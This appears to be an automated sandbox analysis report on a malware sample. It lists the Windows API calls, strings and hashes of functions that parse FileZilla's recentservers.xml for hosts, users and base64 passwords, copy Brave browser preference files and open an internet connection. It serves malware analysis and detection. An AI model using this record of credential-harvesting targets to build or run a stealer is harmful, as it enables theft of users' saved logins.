                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521F9C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521FC2
                          • lstrlen.KERNEL32(0119B1D0), ref: 00521FD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00522000
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0052200B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00522036
                          • lstrlen.KERNEL32(00541794), ref: 00522048
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00522067
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00522073
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00522098
                          • lstrlen.KERNEL32(?), ref: 005220AC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005220D0
                          • lstrcat.KERNEL32(00000000,?), ref: 005220DE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00522103
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052213F
                          • lstrlen.KERNEL32(011ACF20), ref: 0052214E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00522176
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00522181
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                          • String ID: \*.*
                          • API String ID: 712834838-1173974218
                          • Opcode ID: e4898a17f51aa8d956a5b724008fc05151d5269157a1099721a31a2d0c22549f
                          • Instruction ID: ff4120ca7a0a3167deb7360f6f58b72bf9048277ebd2a57f2e9a957358d8386d
                          • Opcode Fuzzy Hash: e4898a17f51aa8d956a5b724008fc05151d5269157a1099721a31a2d0c22549f
                          • Instruction Fuzzy Hash: 6F62803591162BABDB21AB74EC4CAEF7FB9BF92700F044025B805A7291DB34DD85CB94
                          Function 00523910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0052392C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00523943
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0052396C
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 00523986
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005239BF
                          • lstrcpy.KERNEL32(00000000,?), ref: 005239E7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005239F2
                          • lstrlen.KERNEL32(00541794), ref: 005239FD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523A1A
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00523A26
                          • lstrlen.KERNEL32(?), ref: 00523A33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523A53
                          • lstrcat.KERNEL32(00000000,?), ref: 00523A61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523A8A
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00523ACE
                          • lstrlen.KERNEL32(?), ref: 00523AD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523B05
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00523B10
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523B36
                          • lstrlen.KERNEL32(00541794), ref: 00523B48
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523B6A
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00523B76
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523B9E
                          • lstrlen.KERNEL32(?), ref: 00523BB2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523BD2
                          • lstrcat.KERNEL32(00000000,?), ref: 00523BE0
                          • lstrlen.KERNEL32(011A8A20), ref: 00523C0B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523C31
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00523C3C
                          • lstrlen.KERNEL32(011A8B70), ref: 00523C5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523C84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00523C8F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523CB7
                          • lstrlen.KERNEL32(00541794), ref: 00523CC9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523CE8
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00523CF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523D1A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00523D47
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00523D52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523D79
                          • lstrlen.KERNEL32(00541794), ref: 00523D8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523DAD
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00523DB9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523DE2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523E11
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00523E1C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523E43
                          • lstrlen.KERNEL32(00541794), ref: 00523E55
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523E77
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00523E83
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523EAC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523EDB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00523EE6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523F0D
                          • lstrlen.KERNEL32(00541794), ref: 00523F1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523F41
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00523F4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523F75
                          • lstrlen.KERNEL32(?), ref: 00523F89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523FA9
                          • lstrcat.KERNEL32(00000000,?), ref: 00523FB7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00523FE0
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052401F
                          • lstrlen.KERNEL32(011ACF20), ref: 0052402E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524056
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00524061
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052408A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005240CE
                          • lstrcat.KERNEL32(00000000), ref: 005240DB
                          • FindNextFileA.KERNEL32(00000000,?), ref: 005242D9
                          • FindClose.KERNEL32(00000000), ref: 005242E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 1006159827-1013718255
                          • Opcode ID: a57fe9566ac56cc241d3d6409c3856c26aae119bf6ec956bca73e9c0173fa3e9
                          • Instruction ID: eacdcf6624c44c592a5a96d5e6c13116746e73b565732ad66174b8a9ca19ec05
                          • Opcode Fuzzy Hash: a57fe9566ac56cc241d3d6409c3856c26aae119bf6ec956bca73e9c0173fa3e9
                          • Instruction Fuzzy Hash: 8E62713591162B9BDB21AF74EC4DAEE7BB9BF42700F048125B805A7290DB38DD85CB90
                          Function 00526960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526995
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 005269C8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526A29
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00526A34
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526A5D
                          • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00526A77
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526A99
                          • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00526AA5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526AD0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526B00
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00526B35
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526B9D
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526BCD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 313953988-555421843
                          • Opcode ID: 60bdd9b8a83293b07b3f415e69cb2c32211d60c9b921908b162496630b529bb3
                          • Instruction ID: d8e927c76efc748b2f8d442479a36e8f3622a29dff36edf4f27d20b9c383dc76
                          • Opcode Fuzzy Hash: 60bdd9b8a83293b07b3f415e69cb2c32211d60c9b921908b162496630b529bb3
                          • Instruction Fuzzy Hash: 2B429174A0122AABDB21EBB4EC89AAF7FB9BF46700F049415F901E7291DB74DD41CB50
                          Function 0051DB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051DBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DBEF
                          • lstrlen.KERNEL32(00544CA8), ref: 0051DBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DC17
                          • lstrcat.KERNEL32(00000000,00544CA8), ref: 0051DC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DC4C
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051DC8F
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051DCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0051DCD0
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0051DCF0
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 0051DD0A
                          • lstrlen.KERNEL32(0053CFEC), ref: 0051DD1D
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051DD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DD7B
                          • lstrlen.KERNEL32(00541794), ref: 0051DD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DDA3
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051DDAF
                          • lstrlen.KERNEL32(?), ref: 0051DDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 0051DDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DE19
                          • lstrlen.KERNEL32(00541794), ref: 0051DE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051DE6F
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051DE7B
                          • lstrlen.KERNEL32(011A8840), ref: 0051DE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DEBB
                          • lstrlen.KERNEL32(00541794), ref: 0051DEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051DEE6
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051DEF2
                          • lstrlen.KERNEL32(011A8A80), ref: 0051DF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DFA5
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051DFB1
                          • lstrlen.KERNEL32(011A8840), ref: 0051DFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DFF4
                          • lstrlen.KERNEL32(00541794), ref: 0051DFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E022
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051E02E
                          • lstrlen.KERNEL32(011A8A80), ref: 0051E03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051E06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 0051E0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0051E0E7
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051E11F
                          • lstrlen.KERNEL32(011ACF20), ref: 0051E12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E155
                          • lstrcat.KERNEL32(00000000,?), ref: 0051E15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E19F
                          • lstrcat.KERNEL32(00000000), ref: 0051E1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0051E1F9
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051E22F
                          • lstrlen.KERNEL32(011A8A20), ref: 0051E23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E261
                          • lstrcat.KERNEL32(00000000,011A8A20), ref: 0051E269
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0051E988
                          • FindClose.KERNEL32(00000000), ref: 0051E997
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                          • String ID: Brave$Preferences$\Brave\Preferences
                          • API String ID: 1346089424-1230934161
                          • Opcode ID: 1647a92bc30a3cdf41d55d1153a5e48105df22c86816ee649eeb3f32e06bf572
                          • Instruction ID: 4b16225c740a8ff766668d9de4200805ec4496dbe71d1b2d23d4581a34b34d0a
                          • Opcode Fuzzy Hash: 1647a92bc30a3cdf41d55d1153a5e48105df22c86816ee649eeb3f32e06bf572
                          • Instruction Fuzzy Hash: 22526E7591020A9BEB21AFB4DC89AEE7FB9BF85700F044529F80697251DB74DCC5CBA0
                          Function 005160D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 005160FF
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00516152
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00516185
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005161B5
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005161F0
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00516223
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00516233
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 2da6c94599b6a209796d75a734760cb8a7976eab7f1120b7a16a3ae35573604f
                          • Instruction ID: d899ceee862eacc3168b5f72ef536097715f9edbe3bbb16506ac4b6b5f992017
                          • Opcode Fuzzy Hash: 2da6c94599b6a209796d75a734760cb8a7976eab7f1120b7a16a3ae35573604f
                          • Instruction Fuzzy Hash: 8F526C7591021A9BEB21EFB4DC89AEF7BB9BF85300F048425F905A7251DB74EC81CB94
                          Function 00526B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526B9D
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526BCD
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526BFD
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526C2F
                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00526C3C
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00526C43
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00526C5A
                          • lstrlen.KERNEL32(00000000), ref: 00526C65
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526CA8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526CCF
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00526CE2
                          • lstrlen.KERNEL32(00000000), ref: 00526CED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526D30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526D57
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00526D6A
                          • lstrlen.KERNEL32(00000000), ref: 00526D75
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526DB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526DDF
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00526DF2
                          • lstrlen.KERNEL32(00000000), ref: 00526E01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526E49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526E71
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00526E94
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00526EA8
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00526EC9
                          • LocalFree.KERNEL32(00000000), ref: 00526ED4
                          • lstrlen.KERNEL32(?), ref: 00526F6E
                          • lstrlen.KERNEL32(?), ref: 00526F81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 2641759534-2314656281
                          • Opcode ID: d1f6b838f0fcbe698acf6af573f0111c5251046c856acb9ec38b64296fbf522f
                          • Instruction ID: 7f58970b2cd618d3f8913121f931e24a8ed85b1d09551a3b68b5300f7694adb5
                          • Opcode Fuzzy Hash: d1f6b838f0fcbe698acf6af573f0111c5251046c856acb9ec38b64296fbf522f
                          • Instruction Fuzzy Hash: DB029F74A0021AABDB21EBB4EC4DAAF7FB9BF46700F045415F901E7291DB74DD818B64
                          Function 00524B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00524B51
